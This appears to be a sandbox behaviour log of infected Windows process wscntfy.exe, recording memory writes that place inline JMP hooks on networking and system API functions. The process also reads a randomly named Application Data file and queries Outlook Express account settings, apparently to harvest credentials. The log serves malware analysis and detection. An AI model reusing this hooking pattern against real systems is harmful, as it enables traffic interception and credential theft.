1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 AFF134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 3 B08879
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 2645694649
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2645695833
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2645700072
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2645701098
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2645707698
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2645710660
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2645721624
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2645725111
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: C20000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2645738001
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2645774092
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: C20000 Length: C1F8C8 Allocation Type: null Protection: page read and write success or wait 2645780882
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: C20000 Length: C1F8CC Allocation Type: null Protection: page read and write success or wait 2645781079
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2645834691
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2645835193
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2645835588
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2645835977
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2645836366
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645836833
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645837238
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645837645
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645838049
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645838453
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645838854
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645839258
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645839663
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645840067
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645840468
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0000 Length: C1F4C0 Allocation Type: null Protection: page execute and read and write success or wait 2645840989
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645842304
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2645842606
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 C6 7B success or wait 2645843962
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 1E 84 success or wait 2645844663
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645844883
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645846148
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2645846672
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 C7 7B success or wait 2645847328
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 5 Value: E9 09 1F 1E 84 success or wait 2645847947
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645848164
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645848803
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2645849051
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 57 76 success or wait 2645851257
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 5 Value: E9 FD 4B 8D 89 success or wait 2645851891
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645852113
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645853040
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2645853287
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 52 76 success or wait 2645853991
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A 92 89 success or wait 2645854624
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645854846
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645855709
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2645855953
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 52 76 success or wait 2645856649
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 91 89 success or wait 2645857281
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645857502
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645857956
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2645858162
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 57 76 success or wait 2645858884
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C 8D 89 success or wait 2645859511
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645859696
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645860609
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2645860854
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 52 76 success or wait 2645861546
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 5 Value: E9 25 2F 92 89 success or wait 2645862173
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645862392
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645863284
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2645863526
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 52 76 success or wait 2645864216
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 5 Value: E9 0A FA 91 89 success or wait 2645864841
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645865059
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645865667
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2645865908
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 55 76 success or wait 2645866598
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 5 Value: E9 34 EC 8E 89 success or wait 2645867221
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645867439
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645868240
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2645868480
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 53 76 success or wait 2645869167
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 90 89 success or wait 2645869788
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645870005
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645870883
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2645871294
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 52 76 success or wait 2645871999
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 92 89 success or wait 2645872631
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645872853
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645873457
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2645873662
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 55 76 success or wait 2645874327
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 8E 89 success or wait 2645874959
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645875144
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645875942
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2645876186
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 53 76 success or wait 2645876882
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 5 Value: E9 BB ED 90 89 success or wait 2645877513
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645877733
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645878668
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2645878911
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 51 76 success or wait 2645879605
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC 92 89 success or wait 2645880300
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645880525
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2645880827
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2645881072
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D E1 70 success or wait 2645881767
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 03 8F success or wait 2645882668
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2645882887
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2645883421
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2645885477
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2645887454
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2645889444
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2645892797
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2645896035
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2645900920
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2645903943
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2645907050
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2645911282
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2645914232
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2645916879
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2645920126
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2645922554
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2645925438
System info queried Type: ProcessInformation success or wait 2646006217
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2646010850
Thread created PID: 1860 TID: 1748 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2646105113
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 2646106686
System info queried Type: ProcessInformation success or wait 2646107614
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2646112287
Thread created PID: 1860 TID: 1636 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2646209537
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 2646211076
System info queried Type: ProcessInformation success or wait 2646211750
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2646216379
Thread created PID: 1860 TID: 1768 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2646315310
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 2646316510
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 15807505 success or wait 2646316966
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 15807505 success or wait 2646317340
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2646318868
Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: DA0000 Size: 401408 Protection: execute Mapped to pid: own pid object name not found 2646321619
Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 2646322733
Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 2658022136
Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 2658025711
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2658461433
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2659027911
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2659051543
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: query and write and read and execute Type: image Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid success or wait 2659084637
Section loaded Path: \KnownDlls\MSOERT2.dll Access: write and read and execute Type: unknown Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid object name not found 2659116635
Section loaded Path: C:\WINDOWS\system32\msoert2.dll Access: query and write and read and execute Type: image Baseaddress: 76880000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2659120842
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2659416285
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: DA0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2659452798
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: DA0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2659462673
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: DC0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2660909875
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: DC0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2660914683
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: DC0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2660918265
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: DC0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2660979174
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: DC0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2661039119
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: query and write and read and execute Type: image Baseaddress: 71780000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2661043186
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts Name: NULL success or wait 2661391707
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2661404476
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2661547374
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 2661549622
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2661794539
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2661819207
